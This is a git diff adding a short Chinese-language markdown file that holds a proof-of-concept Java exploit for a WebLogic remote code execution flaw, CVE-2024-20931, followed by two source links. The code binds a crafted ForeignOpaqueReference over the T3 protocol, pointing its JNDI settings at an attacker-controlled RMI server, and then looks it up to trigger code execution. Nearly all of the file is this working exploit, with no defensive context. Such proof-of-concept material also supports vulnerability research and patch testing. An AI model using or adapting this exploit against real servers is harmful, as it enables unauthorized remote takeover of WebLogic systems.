Create Weblogic远程代码执行(CVE-2024-20931).md

Weblogic远程代码执行(CVE-2024-20931).md

@@ -0,0 +1,54 @@
+## Weblogic远程代码执行(CVE-2024-20931)
+
+## poc
+```
+package com.supeream;
+
+import weblogic.deployment.jms.ForeignOpaqueReference;
+
+import javax.naming.Context;
+import javax.naming.InitialContext;
+import java.lang.reflect.Field;
+import java.util.Hashtable;
+
+public class CVE_2024_209321 {
+    public static void main(String[] args) throws Exception {
+        String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
+
+        // 创建用来远程绑定对象的InitialContext
+        String url = "t3://127.0.0.1:7001"; // 目标机器
+        Hashtable env1 = new Hashtable();
+        env1.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
+        env1.put(Context.PROVIDER_URL, url); // 目标
+        InitialContext c = new InitialContext(env1);
+
+        // ForeignOpaqueReference的jndiEnvironment属性
+        Hashtable env2 = new Hashtable();
+        env2.put("java.naming.factory.initial", "oracle.jms.AQjmsInitialContextFactory");
+        env2.put("datasource", "rmi://127.0.0.1:1099/ygevmj");
+
+        // ForeignOpaqueReference的jndiEnvironment和remoteJNDIName属性
+        ForeignOpaqueReference f = new ForeignOpaqueReference();
+        Field jndiEnvironment = ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
+        jndiEnvironment.setAccessible(true);
+        jndiEnvironment.set(f, env2);
+        Field remoteJNDIName = ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
+        remoteJNDIName.setAccessible(true);
+        String ldap = "rmi://127.0.0.1:1099/ygevmj";
+        remoteJNDIName.set(f, ldap);
+
+        // 远程绑定ForeignOpaqueReference对象
+        c.rebind("glassy", f);
+
+        // lookup查询ForeignOpaqueReference对象
+        try {
+            c.lookup("glassy");
+        } catch (Exception e) {
+        }
+    }
+}
+```
+
+## 漏洞来源
+- https://github.com/GlassyAmadeus/CVE-2024-20931
+- https://glassyamadeus.github.io/2024/01/31/CVE_2024_20931/